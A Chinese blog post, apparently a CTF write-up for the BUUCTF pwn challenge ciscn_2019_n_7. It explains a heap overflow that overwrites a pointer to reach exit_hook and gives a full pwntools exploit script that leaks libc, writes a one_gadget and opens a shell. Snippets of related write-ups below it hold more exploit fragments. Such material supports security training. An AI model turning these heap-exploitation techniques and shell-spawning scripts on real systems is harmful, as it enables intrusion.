ciscn_2019_n_7

最新推荐文章于 2024-07-14 20:14:03 发布
最新推荐文章于 2024-07-14 20:14:03 发布
阅读量571 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123552230
版权

ciscn_2019_n_7

查看保护
在这里插入图片描述
在这里插入图片描述
这里将name放入在了qword_202018 + 1这个地址,可以输入到+2的位置
在这里插入图片描述
edit的时候改的是 + 2这里的指针,所以这里就存在着一个堆溢出漏洞。
攻击思路:因为add可以改+2位置的指针,所以可以通过add将+2这里指向content的指针给覆盖成exit_hook。因为add被限制所以这里覆盖成exit_hook,然后edit改hook为gadget,这样程序退出的时候会调用exit。
在这里插入图片描述

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27606)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice-> '

def add(size, name):
    r.sendlineafter(menu, '1')
    r.sendafter('Input string Length: ', str(size))
    r.sendafter('Author name:', name)

def edit(name, content):
    r.sendlineafter(menu, '2')
    r.sendafter('New Author name:', name)
    r.sendafter('New contents:', content)

def show():
    r.sendlineafter(menu, '3')

r.sendlineafter(menu, '666')
libc = ELF('libc-2.23.so')

r.recvuntil('0x')
puts_addr = int(r.recv(12), 16)
success('puts_addr = ' + hex(puts_addr))

libc_base = puts_addr - libc.sym['puts']
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = one[3] + libc_base
exit_hook = libc_base + 0x5f0040 + 3848
success('exit_hook = ' + hex(exit_hook))

add(0x10, b'a' * 8 + p64(exit_hook))

edit('c', p64(one_gadget))

r.sendlineafter(menu, 'a')

r.interactive()
z1r0.
关注
专栏目录
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2651
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 598
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
【exit hook】ciscn_2019_n_7
huzai9527的博客
04-19 668
【exit hook】ciscn_2019_n_7 1.ida分析 输入666获得puts地址,计算libc偏移 输入name的时候,可以输入16个字节,但是只有前8个字节可用,后面8个字节是content的指针 2.思路 通过puts计算libc的偏移 溢出到content指针,修改为exit_hook的地址 edit将exit_hook改为onegadget 3.exp from pwn import * p = remote('node3.buuoj.cn',28010)
ciscn_2019_n_7(exit_hook)、wdb_2018_1st_babyheap(fsop的例子)
weixin_46521144的博客
09-08 1236
ciscn_2019_n_7 劫持exit_hook 这道题考察比较单一,劫持exit_hook即可 在ida里面看到,首先会在本地寻找一个log.txt,否则直接段错误。因此现在本地创建一个log.txt。写不写内容都可以。 接下来是exit_hook的位置 exit_hook的位置 在libc-2.23中 exit_hook = libc_base+0x5f0040+3848 exit_hook = libc_base+0x5f0040+3856 在libc-2.27中 exit_hook = lib
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1845
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
ciscn_2019_n_5解题
2301_81504456的博客
07-14 683
linux系统命令和理解好程序运行流程。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTF—ciscn_2019_n_1 1
qq_41560595的博客
09-24 4501
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 419
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
ciscn_2019_n_3 题解
lifanxin的博客
12-30 630
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
第十四届全国大学生信息安全竞赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-16 1万+
第十四届全国大学生信息安全竞赛
水几个pwn
Stella_Leo的博客
08-24 300
author: moqizou 2020-羊城杯-signin 签到题目2.23的glibc add - 最多10个chunk然后会malloc(0x28)之后就是namesize结构体如下 0x10 chunk 头 0x8 1 inuse位置 0x8 buf->name_chunk 0x8 23字节的message 0x8 看上面可以溢出 然后会把该chunk指针 存入全局table view 通过判断inuse输出name和message del uaf,只清除chunk_table和name.
ciscn_2019_n_8 wirte bss data
pondzhang的专栏
05-02 277
from pwn import * p = process("./ciscn_2019_n_8") p.recvuntil('name?\n') payload = p32(0x11) * 14 p.sendline(payload) p.interactive()
Spring Cloud 全面学习案例集,含多种功能示例与教程.zip
11-14
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
AudioStream 1.5.unitypackage
11-14
AudioStream 1.5.unitypackage
驾驭未来:Simulink中PMSM永磁同步电机控制深度解析
11-14
在现代工业自动化和电动汽车领域,永磁同步电机(PMSM)因其高效率、高性能和紧凑设计而备受青睐。本文将详细介绍如何在Simulink中实现PMSM的控制,包括矢量控制(FOC)策略的实现,以及必要的代码示例,旨在为工程师和研究者提供实用的指导。 一、PMSM控制概述 永磁同步电机(PMSM)以其高功率密度、高效率和优异的动态响应而广泛应用于工业和汽车领域。在Simulink中实现PMSM控制,通常采用矢量控制(Field-Oriented Control, FOC)策略,该策略通过磁场定向控制实现电机转矩和速度的精确控制。 二、PMSM数学模型与Simulink实现 PMSM的数学模型包括电压方程、磁链方程和转矩方程。在Simulink中,我们可以通过构建相应的模块来实现这些方程。 1. PMSM数学模型 电压方程: u d = R s i d − ω e L q i q + L d d i d d t + ω e ψ f u d ​ =Rsid−ω e ​ L q ​ iq+
Jupyter_B 站直播事件 webhook 和开播邮件提醒.zip
11-14
Jupyter-Notebook
合成控制法与收敛性分析资料最新集.zip
最新发布
11-14
合成控制法与收敛性分析资料最新集.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值